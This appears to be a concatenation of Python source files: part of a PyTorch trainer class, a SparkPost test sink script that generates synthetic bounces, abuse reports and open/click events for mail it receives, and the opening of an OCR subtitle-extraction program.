self.callbacks.add_callback(EarlyStoppingCallback(self.trainercontrol, **self.configs.early_stopping))
# save checkpoint
if self.configs.model_checkpoint not in no_option_list:
self.callbacks.add_callback(ModelCheckpointCallback(self.trainercontrol, **self.configs.model_checkpoint))
# tensorboard
if self.configs.tensorboard not in no_option_list:
summary_writer_constructor = _get_summary_writer_constructor()
if summary_writer_constructor is not None:
self.callbacks.add_callback(
TensorBoardCallBack(summary_writer_constructor,
**self.configs.tensorboard))
def _create_metric(self):
self.metric = get_metric_by_name(self.configs.metric)
self.metric.to(self.configs.device)
self.loss_metric = get_metric_by_name("MeanMetric")
self.loss_metric.to(self.configs.device)
def _create_loss(self):
if self.override_loss is True:
return
self.loss = _construct_loss_from_config(torch.nn.modules.loss, self.configs.loss)
def _create_optimizer(self, init_lr: float):
if self.override_optimizer is True:
return
self.optimizer = _construct_optimizer_from_config(
optim,
self.configs.optimizer,
model=self.model,
)
for param in self.optimizer.param_groups:
param.setdefault("initial_lr", init_lr)
self.optimizer.lr = init_lr
def _create_scheduler(self, num_training_steps: int, optimizer: torch.optim.Optimizer = None):
if isinstance(self.configs.lr_scheduler_type, str):
self.lr_scheduler = get_scheduler(
self.configs.lr_scheduler_type,
optimizer=self.optimizer if optimizer is None else optimizer,
num_warmup_steps=self.get_warmup_steps(num_training_steps),
num_training_steps=num_training_steps,
)
else:
self.configs.lr_scheduler_type["optimizer"] = optimizer
self.lr_scheduler = _construct_scheduler_from_config(torch.optim.lr_scheduler,
self.configs.lr_scheduler_type)
return self.lr_scheduler
def get_warmup_steps(self, num_training_steps: int) -> int:
"""
Get number of steps used for a linear warmup.
Args:
num_training_steps (`int`):
All training steps when training.
Returns:
(`int`)
Warmup steps.
"""
warmup_steps = (
self.configs.warmup_steps if self.configs.warmup_steps > 0 else math.ceil(
num_training_steps * self.configs.warmup_ratio)
)
return warmup_steps
def load(self, path: str):
"""
Load a model from the path.
Args:
path (`str`):
The folder path containing the model's checkpoints.
"""
state_path = Path(path).joinpath(STATE_CHECKPOINT_NAME)
model_path = Path(path).joinpath(MODEL_NAME)
# modelcard_path = Path(path).joinpath(MODEL_CARD_NAME)
trainer_log.info("Loading from previous checkpoint: %s", model_path)
state_checkpoint = torch.load(state_path, map_location=self.configs.device)
model_checkpoint = torch.load(model_path, map_location=self.configs.device)
self.model.load_state_dict(model_checkpoint)
if isinstance(self.optimizer, Optimizer) and state_checkpoint["optimizer_state_dict"]:
self.optimizer.load_state_dict(state_checkpoint["optimizer_state_dict"])
if self.lr_scheduler and state_checkpoint["lr_scheduler_state_dict"]:
self.lr_scheduler.load_state_dict(state_checkpoint["lr_scheduler_state_dict"])
if "end_lr" not in state_checkpoint:
return 0
self.lr_value = state_checkpoint["end_lr"]
if "epoch" not in state_checkpoint:
return 0
self.epoch = state_checkpoint["epoch"]
self.loss_value = state_checkpoint["loss_value"]
self.metric_value = state_checkpoint["metric_value"]
def save(self, path, overwrite=True):
"""
Save the checkpoint information in a folder.
Args:
path (`str`):
The folder path containing the model's checkpoints.
overwrite (`bool`):
If True, an existing path with the same name will be overwritten.
Raises:
(`FileExistsError`)
If `overwrite` is False and the path already exists, an error is raised.
"""
if is_main_process():
if not overwrite:
if Path(path).exists():
raise FileExistsError("File already exists: ", str(Path(path).resolve()))
Path(path).mkdir(exist_ok=True)
state_path = Path(path).joinpath(STATE_CHECKPOINT_NAME)
model_path = Path(path).joinpath(MODEL_NAME)
modelcard_path = Path(path).joinpath(MODEL_CARD_NAME)
trainer_log.info("save model_path: %s", model_path)
optimizer_state_dict = None
lr_scheduler_state_dict = None
if isinstance(self.optimizer, Optimizer): # if created
optimizer_state_dict = self.optimizer.state_dict()
if self.lr_scheduler is not None:
lr_scheduler_state_dict = self.lr_scheduler.state_dict()
torch.save({
"epoch": self.epoch,
"optimizer_state_dict": optimizer_state_dict,
"lr_scheduler_state_dict": lr_scheduler_state_dict,
"loss_value": self.loss_value,
"metric_value": self.metric_value,
"end_lr": self.lr_value
}, state_path)
torch.save(self.model.state_dict(), model_path)
if isinstance(self.model_card, ModelCard):
self.model_card.save_model_card(modelcard_path)
else:
trainer_log.warning("model card is None.")
def _reset_controller(self):
self.trainercontrol.should_save = False
self.trainercontrol.should_training_stop = False
self.trainercontrol.should_log = False
self.trainercontrol.should_evaluate = False
self.trainercontrol.should_epoch_stop = False
|
consume-mail.py
|
#!/usr/bin/env python3
# Consume mail received from PowerMTA
# command-line params may also be present, as per PMTA Users Guide "3.3.12 Pipe Delivery Directives"
#
# Author: Steve Tuck. (c) 2018 SparkPost
#
# Pre-requisites:
# pip3 install requests, dnspython
#
import os, email, time, glob, requests, dns.resolver, smtplib, configparser, random, argparse, csv, re
import threading, queue
from html.parser import HTMLParser
# workaround as per https://stackoverflow.com/questions/45124127/unable-to-extract-the-body-of-the-email-file-in-python
from email import policy
from webReporter import Results, timeStr
from urllib.parse import urlparse
from datetime import datetime
from bouncerate import nWeeklyCycle
from common import readConfig, configFileName, createLogger, baseProgName, xstr
# -----------------------------------------------------------------------------
# FBL and OOB handling
# -----------------------------------------------------------------------------
ArfFormat = '''From: {fblFrom}
Subject: FW: FBL test
To: {fblTo}
MIME-Version: 1.0
Content-Type: multipart/report; report-type=feedback-report;
boundary="{boundary}"
--{boundary}
Content-Type: text/plain; charset="US-ASCII"
Content-Transfer-Encoding: 7bit
This is an email abuse report for an email message
received from IP {peerIP} on {mailDate}.
For more information about this format please see
http://www.mipassoc.org/arf/.
--{boundary}
Content-Type: message/feedback-report
Feedback-Type: abuse
User-Agent: consume-mail.py/1.0
Version: 1.0
Original-Mail-From: {origFrom}
Original-Rcpt-To: {origTo}
Arrival-Date: {mailDate}
Source-IP: {peerIP}
Reported-Domain: {returnPath}
Reported-Uri: mailto:{origTo}
Removal-Recipient: {origTo}
--{boundary}
Content-Type: message/rfc822
{rawMsg}
--{boundary}--
'''
def buildArf(fblFrom, fblTo, rawMsg, msfbl, returnPath, origFrom, origTo, peerIP, mailDate):
boundary = '_----{0:d}'.format(int(time.time()))
domain = fblFrom.split('@')[1]
msg = ArfFormat.format(fblFrom=fblFrom, fblTo=fblTo, rawMsg=rawMsg, boundary=boundary, returnPath=returnPath,
domain=domain, msfbl=msfbl, origFrom=origFrom, origTo=origTo, peerIP=peerIP, mailDate=mailDate)
return msg
OobFormat = '''From: {oobFrom}
Subject: Returned mail: see transcript for details
Auto-Submitted: auto-generated (failure)
To: {oobTo}
Content-Type: multipart/report; report-type=delivery-status;
boundary="{boundary}"
This is a MIME-encapsulated message
--{boundary}
The original message was received at {mailDate}
from {toDomain} [{peerIP}]
----- The following addresses had permanent fatal errors -----
<{oobFrom}>
(reason: 550 5.0.0 <{oobFrom}>... User unknown)
----- Transcript of session follows -----
... while talking to {toDomain}:
>>> DATA
<<< 550 5.0.0 <{oobFrom}>... User unknown
550 5.1.1 <{oobFrom}>... User unknown
<<< 503 5.0.0 Need RCPT (recipient)
--{boundary}
Content-Type: message/delivery-status
Reporting-MTA: dns; {fromDomain}
Received-From-MTA: DNS; {toDomain}
Arrival-Date: {mailDate}
Final-Recipient: RFC822; {oobFrom}
Action: failed
Status: 5.0.0
Remote-MTA: DNS; {toDomain}
Diagnostic-Code: SMTP; 550 5.0.0 <{oobFrom}>... User unknown
Last-Attempt-Date: {mailDate}
--{boundary}
Content-Type: message/rfc822
{rawMsg}
--{boundary}--
'''
def buildOob(oobFrom, oobTo, rawMsg, peerIP, mailDate):
boundary = '_----{0:d}'.format(int(time.time()))
fromDomain = oobFrom.split('@')[1]
toDomain = oobTo.split('@')[1]
msg = OobFormat.format(oobFrom=oobFrom, oobTo=oobTo, boundary=boundary,
toDomain=toDomain, fromDomain=fromDomain, rawMsg=rawMsg, mailDate=mailDate, peerIP=peerIP)
return msg
# Search for the most preferred MX. Naive implementation in that we only try one MX, the most preferred
def findPreferredMX(a):
assert len(a) > 0
myPref = a[0].preference
myExchange = a[0].exchange.to_text()[:-1] # Take first one in the list, remove trailing '.'
for i in range(1, len(a)):
if a[i].preference < myPref:
myPref = a[i].preference
myExchange = a[i].exchange.to_text()[:-1]
return myExchange
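# Illustrative only (assumes dnspython is available and the domain publishes MX records):
#   answers = dns.resolver.query('example.com', 'MX')
#   best_mx = findPreferredMX(answers)   # hostname of the lowest-preference (most preferred) MX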
# Avoid creating backscatter spam https://en.wikipedia.org/wiki/Backscatter_(email). Check that returnPath points to a known host.
# If valid, returns the (single, preferred, for simplicity) MX and the associated To: addr for FBLs.
def mapRP_MXtoSparkPostFbl(returnPath):
rpDomainPart = returnPath.split('@')[1]
try:
# Will throw exception if not found
mx = findPreferredMX(dns.resolver.query(rpDomainPart, 'MX'))
except dns.exception.DNSException:
try:
# Fall back to using A record - see https://tools.ietf.org/html/rfc5321#section-5
answers = dns.resolver.query(rpDomainPart, 'A')
if answers:
mx = rpDomainPart
else:
return None, None
except dns.exception.DNSException:
return None, None
if mx.endswith('smtp.sparkpostmail.com'): # SparkPost US
fblTo = 'fbl@sparkpostmail.com'
elif mx.endswith('e.sparkpost.com'): # SparkPost Enterprise
tenant = mx.split('.')[0]
fblTo = 'fbl@' + tenant + '.mail.e.sparkpost.com'
elif mx.endswith('smtp.eu.sparkpostmail.com'): # SparkPost EU
fblTo = 'fbl@eu.sparkpostmail.com'
elif mx.endswith('signalsdemo.trymsys.net'): # SparkPost CST demo server domains (general)
fblTo = 'fbl@fbl.' + mx
else:
return None, None
return mx, fblTo # Valid
def getPeerIP(rx):
"""
Extract peer IP address from Received: header
:param rx: email.header
:return: str
"""
peerIP = re.findall(r'\([0-9\.]*\)', rx)  # raw string avoids invalid-escape warnings
if len(peerIP) == 1:
peerIP = peerIP[0].lstrip('(').rstrip(')')
# Note: this is of limited use - it's typically the internal (private) IP address of the ELB feeding in traffic
else:
peerIP = '127.0.0.1' # set a default value
return peerIP
# Generate and deliver an FBL response (to cause a spam_complaint event in SparkPost)
# Based on https://github.com/SparkPost/gosparkpost/tree/master/cmd/fblgen
#
def fblGen(mail, shareRes):
returnPath = addressPart(mail['Return-Path'])
if not returnPath:
shareRes.incrementKey('fbl_missing_return_path')
return '!Missing Return-Path:'
elif not mail['to']:
shareRes.incrementKey('fbl_missing_to')
return '!Missing To:'
else:
fblFrom = addressPart(mail['to'])
mx, fblTo = mapRP_MXtoSparkPostFbl(returnPath)
if not mx:
shareRes.incrementKey('fbl_return_path_not_sparkpost')
return '!FBL not sent, Return-Path not recognized as SparkPost'
else:
origFrom = str(mail['from'])
origTo = str(mail['to'])
peerIP = getPeerIP(mail['Received'])
mailDate = mail['Date']
arfMsg = buildArf(fblFrom, fblTo, mail, mail['X-MSFBL'], returnPath, origFrom, origTo, peerIP, mailDate)
try:
# Deliver an FBL to SparkPost using SMTP direct, so that we can check the response code.
with smtplib.SMTP(mx) as smtpObj:
smtpObj.sendmail(fblFrom, fblTo, arfMsg) # if no exception, the mail is sent (250OK)
shareRes.incrementKey('fbl_sent')
return 'FBL sent,to ' + fblTo + ' via ' + mx
except Exception as err:
shareRes.incrementKey('fbl_smtp_error')
return '!FBL endpoint returned error: ' + str(err)
# Generate and deliver an OOB response (to cause a out_of_band event in SparkPost)
# Based on https://github.com/SparkPost/gosparkpost/tree/master/cmd/oobgen
def oobGen(mail, shareRes):
returnPath = addressPart(mail['Return-Path'])  # mirror fblGen(): extract the address from the Return-Path header
if not returnPath:
shareRes.incrementKey('oob_missing_return_path')
return '!Missing Return-Path:'
elif not mail['to']:
shareRes.incrementKey('oob_missing_to')
return '!Missing To:'
else:
mx, _ = mapRP_MXtoSparkPostFbl(returnPath)
if not mx:
shareRes.incrementKey('oob_return_path_not_sparkpost')
return '!OOB not sent, Return-Path ' + returnPath + ' does not have a valid MX'
else:
# OOB is addressed back to the Return-Path: address, from the inbound To: address (i.e. the sink)
oobTo = returnPath
oobFrom = addressPart(mail['To'])
peerIP = getPeerIP(mail['Received'])
mailDate = mail['Date']
oobMsg = buildOob(oobFrom, oobTo, mail, peerIP, mailDate)
try:
# Deliver an OOB to SparkPost using SMTP direct, so that we can check the response code.
with smtplib.SMTP(mx) as smtpObj:
smtpObj.sendmail(oobFrom, oobTo, oobMsg) # if no exception, the mail is sent (250OK)
shareRes.incrementKey('oob_sent')
return 'OOB sent,from {} to {} via {}'.format(oobFrom, oobTo, mx)
except Exception as err:
shareRes.incrementKey('oob_smtp_error')
return '!OOB endpoint returned error: ' + str(err)
# -----------------------------------------------------------------------------
# Open and Click handling
# -----------------------------------------------------------------------------
# Heuristic for whether this is really SparkPost: identifies itself in Server header
# if domain in allowlist, then skip the checks
def isSparkPostTrackingEndpoint(s, url, shareRes, openClickTimeout, trackingDomainsAllowlist):
err = None
scheme, netloc, _, _, _, _ = urlparse(url)
if netloc in trackingDomainsAllowlist:
return True, err
baseurl = scheme + '://' + netloc
# optimisation - check if we already know this is SparkPost or not
known = shareRes.getKey(baseurl)
if known:
known_bool = (known == b'1')
if not known_bool:
err = '!Tracking domain ' + baseurl + ' blocked'
return known_bool, err # response is Bytestr, compare back to a Boolean
else:
# Ping the path prefix for clicks
r = s.get(baseurl + '/f/a', allow_redirects=False, timeout=openClickTimeout)
isSparky = r.headers.get('Server') == 'msys-http'
if not isSparky:
err = url + ',status_code ' + str(r.status_code)
# NOTE redis-py now needs data passed in bytestr
isB = str(int(isSparky)).encode('utf-8')
_ = shareRes.setKey(baseurl, isB, ex=3600) # mark this as known, but with an expiry time
return isSparky, err
# Improved "GET" - doesn't follow the redirect, and opens as stream (so doesn't actually fetch a lot of stuff)
def touchEndPoint(s, url, openClickTimeout, userAgent):
_ = s.get(url, allow_redirects=False, timeout=openClickTimeout, stream=True, headers={'User-Agent': userAgent})
# Parse html email body, looking for open-pixel and links. Follow these to do open & click tracking
class MyHTMLOpenParser(HTMLParser):
def __init__(self, s, shareRes, openClickTimeout, userAgent, trackingDomainsAllowlist):
HTMLParser.__init__(self)
self.requestSession = s # Use persistent 'requests' session for speed
self.shareRes = shareRes # shared results handle
self.err = None # use this to return results strings
self.openClickTimeout = openClickTimeout
self.userAgent = userAgent
self.trackingDomainsAllowlist = trackingDomainsAllowlist
def handle_starttag(self, tag, attrs):
if tag == 'img':
for attrName, attrValue in attrs:
if attrName == 'src':
# attrValue = url
isSP, self.err = isSparkPostTrackingEndpoint(self.requestSession, attrValue, self.shareRes, self.openClickTimeout, self.trackingDomainsAllowlist)
if isSP:
touchEndPoint(self.requestSession, attrValue, self.openClickTimeout, self.userAgent)
else:
self.shareRes.incrementKey('open_url_not_sparkpost')
# NOTE: this method is shadowed by the instance attribute self.err set in __init__;
# callers read the attribute directly (e.g. htmlOpenParser.err)
def err(self):
return self.err
class MyHTMLClickParser(HTMLParser):
def __init__(self, s, shareRes, openClickTimeout, userAgent, trackingDomainsAllowlist):
HTMLParser.__init__(self)
self.requestSession = s # Use persistent 'requests' session for speed
self.shareRes = shareRes # shared results handle
self.err = None # use this to return results strings
self.openClickTimeout = openClickTimeout
self.userAgent = userAgent
self.trackingDomainsAllowlist = trackingDomainsAllowlist
def handle_starttag(self, tag, attrs):
if tag == 'a':
for attrName, attrValue in attrs:
if attrName == 'href':
# attrValue = url
isSP, self.err = isSparkPostTrackingEndpoint(self.requestSession, attrValue, self.shareRes, self.openClickTimeout, self.trackingDomainsAllowlist)
if isSP:
touchEndPoint(self.requestSession, attrValue, self.openClickTimeout, self.userAgent)
else:
self.shareRes.incrementKey('click_url_not_sparkpost')
# NOTE: as above, shadowed by the instance attribute self.err set in __init__
def err(self):
return self.err
# open / open again / click / click again logic, as per conditional probabilities
# takes a persistent requests session object
def openClickMail(mail, probs, shareRes, s, openClickTimeout, userAgent, trackingDomainsAllowlist):
ll = ''
bd = mail.get_body(('html',))
if bd: # if no body to parse, ignore
body = bd.get_content() # this handles quoted-printable type for us
htmlOpenParser = MyHTMLOpenParser(s, shareRes, openClickTimeout, userAgent, trackingDomainsAllowlist)
shareRes.incrementKey('open')
htmlOpenParser.feed(body)
e = htmlOpenParser.err
ll += '_Open' if e == None else e
if random.random() <= probs['OpenAgain_Given_Open']:
htmlOpenParser.feed(body)
ll += '_OpenAgain' if e == None else e
shareRes.incrementKey('open_again')
if random.random() <= probs['Click_Given_Open']:
htmlClickParser = MyHTMLClickParser(s, shareRes, openClickTimeout, userAgent, trackingDomainsAllowlist)
htmlClickParser.feed(body)
ll += '_Click' if e == None else e
shareRes.incrementKey('click')
if random.random() <= probs['ClickAgain_Given_Click']:
htmlClickParser.feed(body)
ll += '_ClickAgain' if e == None else e
shareRes.incrementKey('click_again')
return ll
def addressSplit(e):
"""
:param e: email.header
:return: displayName, localpart, domainpart str
"""
s = str(e)
displayName = ''
openB = s.find('<')
closeB = s.find('>')
if openB >= 0 and closeB >= 0:
displayName = s[:openB].strip(' ')
s = s[openB+1:closeB].strip(' ') # this is the address part
localpart, domainpart = s.split('@')
return displayName, localpart, domainpart
def addressPart(e):
"""
:param e: email.header
:return: str Just the local@domain part
"""
_, localPart, domainPart = addressSplit(e)
return localPart + '@' + domainPart
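# Worked example (sketch): for a header value such as 'Bob Lumreeker <bob@example.com>',
# addressSplit() returns ('Bob Lumreeker', 'bob', 'example.com') and addressPart() returns
# 'bob@example.com'. A bare address with no display name, e.g. 'bob@example.com',
# yields ('', 'bob', 'example.com'). The name and domain here are purely illustrative.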
# -----------------------------------------------------------------------------
# Process a single mail file according to the probabilistic model & special subdomains
# If special subdomains used, these override the model, providing SPF check has passed.
# Actions taken are recorded in a string which is passed back for logging, via clumsy
# For efficiency, takes a pre-allocated http requests session for opens/clicks, and can be multi-threaded
# Now opens, parses and deletes the file here inside the sub-process
# -----------------------------------------------------------------------------
def processMail(fname, probs, shareRes, resQ, session, openClickTimeout, userAgents, signalsTrafficPrefix, signalsOpenDays, doneMsgFileDest, trackingDomainsAllowlist):
try:
logline=''
with open(fname) as fIn:
mail = email.message_from_file(fIn, policy=policy.default)
xhdr = mail['X-Bouncy-Sink']
if doneMsgFileDest and xhdr and 'store-done' in xhdr.lower():
if not os.path.isdir(doneMsgFileDest):
os.mkdir(doneMsgFileDest)
donePathFile = os.path.join(doneMsgFileDest, os.path.basename(fname))
os.rename(fname, donePathFile)
else:
os.remove(fname) # OK to remove while open, contents destroyed once file handle closed
# Log addresses. Some rogue / spammy messages seen are missing From and To addresses
logline += fname + ',' + xstr(mail['to']) + ',' + xstr(mail['from'])
shareRes.incrementKey('total_messages')
ts_min_resolution = int(time.time()//60)*60
shareRes.incrementTimeSeries(str(ts_min_resolution))
# Test that message was checked by PMTA and has valid DKIM signature
auth = mail['Authentication-Results']
if auth != None and 'dkim=pass' in auth:
# Check for special "To" subdomains that signal what action to take (for safety, these also require inbound spf to have passed)
subd = mail['to'].split('@')[1].split('.')[0]
# SparkPost Signals engagement-recency adjustments
doIt = True
_, localpart, _ = addressSplit(mail['To'])
alphaPrefix = localpart.split('+')[0]
finalChar = localpart[-1] # final char should be a digit 0-9
if alphaPrefix == signalsTrafficPrefix and str.isdigit(finalChar):
currentDay = datetime.now().day # 1 - 31
finalDigit = int(finalChar)
doIt = currentDay in signalsOpenDays[finalDigit]
logline += ',currentDay={},finalDigit={}'.format(currentDay, finalDigit)
if subd == 'oob':
if 'spf=pass' in auth:
logline += ',' + oobGen(mail, shareRes)
else:
logline += ',!Special ' + subd + ' failed SPF check'
shareRes.incrementKey('fail_spf')
elif subd == 'fbl':
if 'spf=pass' in auth:
logline += ',' + fblGen(mail, shareRes)
else:
logline += ',!Special ' + subd + ' failed SPF check'
shareRes.incrementKey('fail_spf')
elif subd == 'openclick':
# doesn't need SPF pass
logline += ',' + openClickMail(mail, probs, shareRes, session, openClickTimeout, random.choice(userAgents), trackingDomainsAllowlist)
elif subd == 'accept':
logline += ',Accept'
shareRes.incrementKey('accept')
else:
# Apply probabilistic model to all other domains
if random.random() <= probs['OOB']:
# Mail that out-of-band bounces would not make it to the inbox, so would not get opened, clicked or FBLd
logline += ',' + oobGen(mail, shareRes)
elif random.random() <= probs['FBL']:
logline += ',' + fblGen(mail, shareRes)
elif random.random() <= probs['Open'] and doIt:
logline += ',' + openClickMail(mail, probs, shareRes, session, openClickTimeout, random.choice(userAgents), trackingDomainsAllowlist)
else:
logline += ',Accept'
shareRes.incrementKey('accept')
else:
logline += ',!DKIM fail:' + xstr(auth)
shareRes.incrementKey('fail_dkim')
except Exception as err:
logline += ',!Exception: '+ str(err)
finally:
resQ.put(logline)
# -----------------------------------------------------------------------------
# Consume emails using threads/processes
# -----------------------------------------------------------------------------
# start to consume files - set up logging, record start time (if first run)
def startConsumeFiles(logger, cfg, fLen):
startTime = time.time() # measure run time
shareRes = Results() # class for sharing summary results
k = 'startedRunning'
res = shareRes.getKey(k) # read back results from previous run (if any)
if not res:
st = timeStr(startTime)
ok = shareRes.setKey(k, st)
logger.info('** First run - set {} = {}, ok = {}'.format(k, st, ok))
maxThreads = cfg.getint('Max_Threads', 16)
logger.info('** Process starting: consuming {} mail file(s) with {} threads'.format(fLen, maxThreads))
return shareRes, startTime, maxThreads
def stopConsumeFiles(logger, shareRes, startTime, countDone):
endTime = time.time()
runTime = endTime - startTime
runRate = (0 if runTime == 0 else countDone / runTime) # Ensure no divide by zero
logger.info('** Process finishing: run time(s)={:.3f},done {},done rate={:.3f}/s'.format(runTime, countDone, runRate))
history = 10 * 24 * 60 * 60 # keep this much time-series history (seconds)
shareRes.delTimeSeriesOlderThan(int(startTime) - history)
# return arrays of resources per thread
def initThreads(maxThreads):
th = [None] * maxThreads
thSession = [None] * maxThreads
for i in range(maxThreads):
thSession[i] = requests.session()
return th, thSession
# search for a free slot, with memory (so acts as round-robin)
def findFreeThreadSlot(th, thIdx):
t = (thIdx+1) % len(th)
while True:
if th[t] == None: # empty slot
return t
elif not th[t].is_alive(): # thread just finished
th[t] = None
return t
else: # keep searching
t = (t+1) % len(th)
if t == thIdx:
# already polled each slot once this call - so wait a while
time.sleep(0.1)
# Wait for threads to complete, marking them as None when done. Get logging results text back from queue, as this is
# thread-safe and process-safe
def gatherThreads(logger, th, gatherTimeout):
for i, tj in enumerate(th):
if tj:
tj.join(timeout=gatherTimeout) # for safety in case a thread hangs, set a timeout
if tj.is_alive():
logger.error('Thread {} timed out'.format(tj))
th[i] = None
# consume a list of files, delegating to worker threads / processes
def consumeFiles(logger, fnameList, cfg):
try:
shareRes, startTime, maxThreads = startConsumeFiles(logger, cfg, len(fnameList))
countDone = 0
signalsTrafficPrefix = cfg.get('Signals_Traffic_Prefix', '')
if signalsTrafficPrefix:
maxDayCount = 0
activeDigitDays = 0
signalsOpenDays = []
for i in range(0, 10):
daystr = cfg.get('Digit' + str(i) + '_Days', '0')
dayset = {int(j) for j in daystr.split(',')}
signalsOpenDays.append(dayset) # list of sets
maxDayCount = max(maxDayCount, len(dayset))
activeDigitDays += len(dayset)
activeDigitDensity = activeDigitDays/(10*maxDayCount)
else:
activeDigitDensity = 1.0
probs = getBounceProbabilities(cfg, activeDigitDensity, logger)
logger.info(probs)
openClickTimeout = cfg.getint('Open_Click_Timeout', 30)
gatherTimeout = cfg.getint('Gather_Timeout', 120)
userAgents = getUserAgents(cfg, logger)
doneMsgFileDest = cfg.get('Done_Msg_File_Dest')
trackingDomainsAllowlist = cfg.get('Tracking_Domains_Allowlist', '').replace(' ', '').split(',')
if probs:
th, thSession = initThreads(maxThreads)
resultsQ = queue.Queue()
thIdx = 0 # round-robin slot
for fname in fnameList:
if os.path.isfile(fname):
# check and get a free process space
thIdx = findFreeThreadSlot(th, thIdx)
th[thIdx] = threading.Thread(target=processMail, args=(fname, probs, shareRes, resultsQ, thSession[thIdx], openClickTimeout, userAgents, signalsTrafficPrefix, signalsOpenDays, doneMsgFileDest, trackingDomainsAllowlist))
th[thIdx].start() # launch concurrent process
countDone += 1
emitLogs(resultsQ)
# check any remaining threads to gather back in
gatherThreads(logger, th, gatherTimeout)
emitLogs(resultsQ)
except Exception as e: # catch any exceptions, keep going
print(e)
logger.error(str(e))
stopConsumeFiles(logger, shareRes, startTime, countDone)
def emitLogs(resQ):
while not resQ.empty():
logger.info(resQ.get()) # write results to the logfile
# -----------------------------------------------------------------------------
# Set up probabilistic model for incoming mail from config
# -----------------------------------------------------------------------------
# Set conditional probability in mutable dict P for event a given event b. https://en.wikipedia.org/wiki/Conditional_probability
def checkSetCondProb(P, a, b, logger):
aGivenbName = a + '_Given_' + b
PaGivenb = P[a] / P[b]
if PaGivenb < 0 or PaGivenb > 1:
logger.error('Config file problem: {} and {} implies {} = {}, out of range'.format(a, b, aGivenbName, PaGivenb))
return None
else:
P[aGivenbName] = PaGivenb
return True
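# Worked example (illustrative figures only): with P['Open'] = 0.20 and P['OpenAgain'] = 0.10,
# checkSetCondProb(P, 'OpenAgain', 'Open', logger) stores
#   P['OpenAgain_Given_Open'] = 0.10 / 0.20 = 0.5
# i.e. half of the opened messages get opened a second time. A ratio outside [0, 1] is rejected
# and reported as a config file problem.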
# For safety, clip values to lie in range 0.0 <= n <= 1.0
def probClip(n):
return max(0.0, min(1.0, n))
# Take the overall percentages and adjust them according to how much traffic we expect to receive. This app does not see
# the 'Upstream_Handled' traffic percentage, as PMTA blackholes / in-band-bounces that portion automatically via PMTA config rather than in this application
# Express all values as probabilities 0 <= p <= 1.0
#
# For Signals, scale the open factor to allow for the filtering by active digit density
def getBounceProbabilities(cfg, activeDigitDensity, logger):
try:
thisAppTraffic = 1 - cfg.getfloat('Upstream_Handled') / 100
P = {
'OOB' : cfg.getfloat('OOB_percent') / 100 / thisAppTraffic,
'FBL' : cfg.getfloat('FBL_percent') / 100 / thisAppTraffic,
'Open' : cfg.getfloat('Open_percent') / 100 / thisAppTraffic,
'OpenAgain' : cfg.getfloat('Open_Again_percent') / 100 / thisAppTraffic,
'Click' : cfg.getfloat('Click_percent') / 100 / thisAppTraffic,
'ClickAgain': cfg.getfloat('Click_Again_percent') / 100 / thisAppTraffic
}
# Adjust open rates according to Signals periodic traffic profile, if present
weeklyCycleOpenList = cfg.get('Weekly_Cycle_Open_Rate', '1.0').split(',')
weeklyCycleOpenRate = [float(i) for i in weeklyCycleOpenList]
todayOpenFactor, _ = nWeeklyCycle(weeklyCycleOpenRate, datetime.utcnow())
todayOpenFactor = probClip(todayOpenFactor/activeDigitDensity)
P['Open'] = probClip(P['Open'] * todayOpenFactor)
P['OpenAgain'] = probClip(P['OpenAgain'] * todayOpenFactor)
P['Click'] = probClip(P['Click'] * todayOpenFactor)
P['ClickAgain'] = probClip(P['ClickAgain'] * todayOpenFactor)
# calculate conditional open & click probabilities, given a realistic state sequence would be
# Open?
# - Maybe OpenAgain?
# - Maybe Click?
# - Maybe ClickAgain?
if checkSetCondProb(P, 'OpenAgain', 'Open', logger) \
and checkSetCondProb(P, 'Click', 'Open', logger) \
and checkSetCondProb(P, 'ClickAgain', 'Click', logger):
return P
else:
return None
except (ValueError, configparser.Error) as e:
logger.error('Config file problem: '+str(e))
return None
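# Worked example (hypothetical config values): with Upstream_Handled = 20 and OOB_percent = 2,
# thisAppTraffic = 1 - 20/100 = 0.8 and P['OOB'] = 0.02 / 0.8 = 0.025. The rate is scaled up
# because this app only sees the 80% of traffic that PMTA did not already handle in-band.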
# Get a list of realistic User Agent strings from the specified file in config
def getUserAgents(cfg, logger):
uaFileName = cfg.get('User_Agents_File')
if os.path.isfile(uaFileName):
with open(uaFileName, newline='') as uaFile:
ua = csv.DictReader(uaFile)
uaStringList = []
for u in ua:
uaStringList.append(u['Software'])
return uaStringList
else:
logger.error('Unable to open User_Agents_File '+uaFileName)
return None
# -----------------------------------------------------------------------------
# Main code
# -----------------------------------------------------------------------------
parser = argparse.ArgumentParser(description='Consume inbound mails, generating opens, clicks, OOBs and FBLs. Config file {} must be present in current directory.'.format(configFileName()))
parser.add_argument('directory', type=str, help='directory to ingest .msg files, process and delete them', )
parser.add_argument('-f', action='store_true', help='Keep looking for new files forever (like tail -f does)')
args = parser.parse_args()
cfg = readConfig(configFileName())
logger = createLogger(cfg.get('Logfile', baseProgName() + '.log'),
cfg.getint('Logfile_backupCount', 10))
if args.directory:
if args.f:
# Process the inbound directory forever
while True:
fnameList = glob.glob(os.path.join(args.directory, '*.msg'))
if fnameList:
consumeFiles(logger, fnameList, cfg)
time.sleep(5)
cfg = readConfig(configFileName()) # get config again, in case it's changed
else:
# Just process once
fnameList = glob.glob(os.path.join(args.directory, '*.msg'))
if fnameList:
consumeFiles(logger, fnameList, cfg)
|
main.py
|
# -*- coding: utf-8 -*-
"""
@Author : Fang Yao
@Time : 2021/3/24 9:28 AM
@FileName: main.py
@desc: Main program entry point
"""
import re
import os
import random
from collections import Counter
import unicodedata
from threading import Thread
import cv2
from Levenshtein import ratio
from PIL import Image
from numpy import average, dot, linalg
import numpy as np
import sys
sys.path.insert(0, os.path.dirname(__file__))
import config
from config import interface_config
from tools.reformat_en import reformat
from tools.infer import utility
from tools.infer.predict_det import TextDetector
from tools.infer.predict_system import TextSystem
import platform
# Load the text detection + recognition models
class OcrRecogniser:
def __init__(self):
# Get the argument object
self.args = utility.parse_args()
self.recogniser = self.init_model()
def predict(self, image):
detection_box, recognise_result = self.recogniser(image)
return detection_box, recognise_result
def init_model(self):
self.args.use_gpu = config.USE_GPU
if config.USE_GPU:
# Set the text detection model path
self.args.det_model_dir = config.DET_MODEL_PATH
# Set the text recognition model path
self.args.rec_model_dir = config.REC_MODEL_PATH
else:
# Load the fast (lightweight) detection model
self.args.det_model_dir = config.DET_MODEL_FAST_PATH
# Load the fast (lightweight) recognition model
self.args.rec_model_dir = config.REC_MODEL_FAST_PATH
# Set the dictionary path
self.args.rec_char_dict_path = config.DICT_PATH
# Set the type of text to recognise
self.args.rec_char_type = config.REC_CHAR_TYPE
return TextSystem(self.args)
class SubtitleDetect:
